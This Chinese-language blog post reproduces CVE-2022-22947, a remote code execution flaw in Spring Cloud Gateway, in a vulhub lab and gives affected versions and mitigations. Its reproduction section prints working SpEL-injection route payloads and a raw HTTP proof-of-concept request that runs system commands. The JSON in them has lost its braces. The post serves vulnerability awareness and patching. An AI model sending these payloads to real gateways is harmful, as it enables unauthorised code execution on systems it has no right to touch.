Spring Cloud Gateway 远程代码执行漏洞（CVE-2022-22947）

Posted 2023-03-29 whatever`

一、漏洞描述

Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的网关，它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。

3月1日，VMware发布安全公告，Spring Cloud Gateway中存在远程代码执行漏洞（CVE-2022-22947），该漏洞的CVSSv3评分为10.0。当启用或暴露不安全的 Gateway Actuator 端点时，使用 Spring Cloud Gateway 的应用程序容易受到代码注入攻击，远程攻击者可以通过发送恶意请求以执行任意代码。

二、影响版本

Spring Cloud Gateway 3.1.0

Spring Cloud Gateway 3.0.0 - 3.0.6

Spring Cloud Gateway 其它不支持的、已不再更新的版本

三、环境搭建

从vulhub下载Vulhub - Docker-Compose file for vulnerability environment漏洞库后，找到CVE-2022-22947直接启动

docker-compose up -d

四、漏洞复现

1、首先，修改GET /actuator请求，确定actuator端口已经开启

2、修改get请求，获取路由信息GET /actuator/gateway/routes/:

当前只有路由index,该路有默认跳转到uri:http://example.com:80

2、然后，构造一个post请求包，POST /actuator/gateway/routes/test 添加一个包含恶意SpEL表达式的路由：

"id": "test",

"filters": [

"name": "AddResponseHeader",

"args":

"value": "#new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]\\"whoami\\").getInputStream()))",

"name": "cmd"

],

"uri": "http://example.com:80",

"order": 0

3、刷新路由，POST /actuator/gateway/refresh

2、获取路由信息GET /actuator/gateway/routes/，新增路由test成功：

3、构造get请求，查看当前路由信息，GET /actuator/gateway/routes/test,检索结果命令执行结果，当前用户为root ：

最后，删除我们前面构造的路由,DELETE /actuator/gateway/routes/test

五、解决方法

1、升级更新到以下版本：

Spring Cloud Gateway >= 3.1.1

Spring Cloud Gateway >= 3.0.7

2、缓解措施：

1.如果不需要Gateway actuator endpoint，可通过 management.endpoint.gateway.enabled: false 禁用它。

2.如果需要actuator，则应使用 Spring Security 对其进行防护，可参考：https://docs.spring.io/spring-boot/docs/current/reference/html/actuator.html#actuator.endpoints.security

参考链接：

【漏洞通告】Spring Cloud Gateway 远程代码执行漏洞（CVE-2022-22947）-启明星辰

Spring-Cloud-Gateway-CVE-2022-22947

漏洞描述

Spring Cloud Gateway远程代码执行漏洞的安全公告。该漏洞为当Spring Cloud Gateway启用和暴露 Gateway Actuator 端点时，使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求，从而远程执行任意代码。

影响版本

Spring Cloud Gateway < 3.1.1 Spring Cloud Gateway < 3.0.7 Spring Cloud Gateway 旧的、不受支持的版本也会受到影响 【安全版本】

Spring Cloud Gateway >= 3.1.1 Spring Cloud Gateway >= 3.0.7

Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关，它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。

修复建议

临时修复建议：

如果不需要网关执行器端点，则应通过 management.endpoint.gateway.enabled: false 禁用它。如果需要执行器，则应使用 Spring Security 对其进行保护，请参阅https://docs.spring.io/spring-boot/docs/current/reference/html/actuator.html#actuator.endpoints.security

通用修复建议：

官方已发布安全版本，请及时下载更新，下载地址：https://github.com/spring-cloud/spring-cloud-gateway

漏洞利用

POC

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

  "id": "hacktest",
  "filters": [
    "name": "AddResponseHeader",
    "args": 
      "name": "Result",
      "value": "#new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]\\"id\\").getInputStream()))"
    
  ],
  "uri": "http://example.com"

利用脚本获取

关注公众号后台回复“CVE-2022-22947”